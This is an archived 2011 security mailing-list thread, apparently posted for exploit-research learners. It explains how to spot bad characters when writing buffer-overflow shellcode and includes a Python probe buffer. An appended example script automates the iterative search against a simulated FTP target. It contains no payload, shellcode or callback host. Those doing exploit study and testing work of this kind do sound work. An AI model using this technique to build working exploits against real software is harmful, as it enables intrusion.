Security Basics mailing list archives
RE: Finding Bad Characters in Exploit Research?
From: "Demetris Papapetrou" <dpapapetrou () internalaudit gov cy>
Date: Fri, 11 Mar 2011 11:48:23 +0200
Hi John,

I apologize for the delayed response. I was hoping that someone more experienced in the field of buffer overflows would answer your question. Since no one mentioned an easy way to detect bad characters, I have decided to provide you with the one I use (manual work required).

Let's say that the buffer you are trying to overflow has a size of 512 bytes and when you successfully overflow it you have an extra space of 512 bytes after it. Let's say that EIP is overwritten at bytes 514-517. So in order to detect which characters may break your shellcode, you overflow the buffer with 520 * A and then you insert into the extra space the hex representation of all 256 ASCII characters.

Python extract
--------------

# Bad characters (hex representation of all 256 ascii characters)
buffer = '\x41' * 520
buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
           "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
           "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
           "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
           "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
           "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
           "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
           "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
           "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
           "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
           "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
           "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
           "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
           "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
           "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
           "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

Now, when the buffer overflow happens and EIP is overwritten with AAAA, Olly/Immunity debugger will throw an exception and pause program execution. At this point you need to observe the stack and find your string of As. After the long string of As you should find the string of 256 ASCII characters. If there is a bad character in it, the string won't be 256 characters long. Its length will usually be one character less than the position of the offending character.

For example, the characters \x0a and \x0d are usually marked as bad because they are the Line Feed (LF) and Carriage Return (CR) characters and signify the end of a command (e.g. the FTP USER command issued during the authentication phase). So if we observe the stack of the FTP application during the crash, the string of ASCII characters following the string of As will be \x01\x02\x03\x04\x05\x06\x07\x08\x09, which means that the next character in the string (i.e. \x0a) is a bad one.

Please note that, following the identification of a bad character, you need to perform the same procedure again and again, but each time removing the offending character from the ASCII string. Hence in our second attempt the ASCII string that we will find in the stack will be \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c, which signifies that the next bad character is \x0d. Note that in this string there is no \x0a because the ASCII string sent to the program was 255 characters long instead of 256 (\x0a was removed from the string).

I hope I helped.

Regards,
Demetris Papapetrou

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of John Nash
Sent: Thursday, February 17, 2011 6:36 PM
To: security-basics
Subject: Finding Bad Characters in Exploit Research?

Hello All,

Just dived into exploit research and finding bad characters is killing me! Can someone point me to a good document / methodology / automated way to find bad characters? Any help will be greatly appreciated!
Rgds,
JN
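The iterative procedure described in the reply above, as an added example that is not part of the original post or the poster's own script: build the probe string minus the characters already known to be bad, compare what the debugger shows after the string of As with what was sent, and repeat until the probe comes back intact. The comparison is byte-by-byte rather than length-only, so it also catches a character that is rewritten in place (for example by a character-set conversion) rather than truncating the command. The `deliver` callback and the `fake_ftp_target` stand-in are assumptions: the former represents sending the buffer and copying the post-EIP region back out of the debugger's memory dump, the latter is a constructed model of the FTP server in the reply, which cuts the command at the first CR or LF.

```python
#!/usr/bin/env python3
"""Bad-character hunting, modelled on the manual procedure in the reply.

Added example, not from the original post. The target is a constructed
stand-in; with a real target, `deliver` would send the buffer and return
the bytes copied from the stack in the debugger after the crash.
"""


def badchar_probe(exclude=()):
    """Bytes 0x01..0xff in order, minus the characters already found bad.

    0x00 is left out from the start, as in the reply's probe string, since a
    NUL terminates a C string and would cut the probe off immediately.
    """
    skip = set(exclude)
    return bytes(b for b in range(1, 256) if b not in skip)


def build_buffer(offset, exclude=()):
    """Filler up to and past the saved EIP, followed by the probe."""
    return b"A" * offset + badchar_probe(exclude)


def first_bad_char(sent, observed):
    """Compare the probe we sent with the bytes read back from the stack.

    Returns the first sent byte that did not survive (either the probe was
    truncated there, or the byte came back changed), or None if the whole
    probe is intact.
    """
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_all_bad_chars(deliver, offset=520, max_rounds=256):
    """Repeat send / inspect / drop-offender until the probe survives.

    `deliver(buffer)` is a hypothetical callback standing in for sending the
    buffer to the target and copying memory back from the debugger. The same
    offset (520 in the reply) is used every round.
    """
    bad = []
    for _ in range(max_rounds):
        probe = badchar_probe(bad)
        observed = deliver(build_buffer(offset, bad))[offset:]
        b = first_bad_char(probe, observed)
        if b is None:
            return bad
        bad.append(b)
    raise RuntimeError("no convergence after %d rounds" % max_rounds)


def fake_ftp_target(buffer, mangle_ff=False):
    """Constructed stand-in for the FTP server in the reply.

    The command ends at the first CR or LF, so nothing past it reaches the
    stack. With mangle_ff=True the target additionally rewrites 0xff to '?',
    modelling a character-set conversion that changes a byte instead of
    truncating the command.
    """
    cut = len(buffer)
    for i, b in enumerate(buffer):
        if b in (0x0a, 0x0d):
            cut = i
            break
    data = buffer[:cut]
    if mangle_ff:
        data = data.replace(b"\xff", b"?")
    return data


if __name__ == "__main__":
    print([hex(b) for b in find_all_bad_chars(fake_ftp_target)])
    print([hex(b) for b in
           find_all_bad_chars(lambda buf: fake_ftp_target(buf, mangle_ff=True))])
```

Against the truncating target the rounds reproduce the reply exactly: the first probe comes back as \x01..\x09, so \x0a is dropped; the second comes back as \x01..\x09\x0b\x0c, so \x0d is dropped; the third survives. With the mangling variant a third round is needed, because the probe is the right length but \xff has come back as '?', which a length check alone would miss. Each new set of known-bad bytes is the list to hand to an encoder when the shellcode is generated.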
Current thread:
- RE: Finding Bad Characters in Exploit Research? Demetris Papapetrou (Mar 11)
- RE: Finding Bad Characters in Exploit Research? Peter Van Eeckhoutte (Mar 11)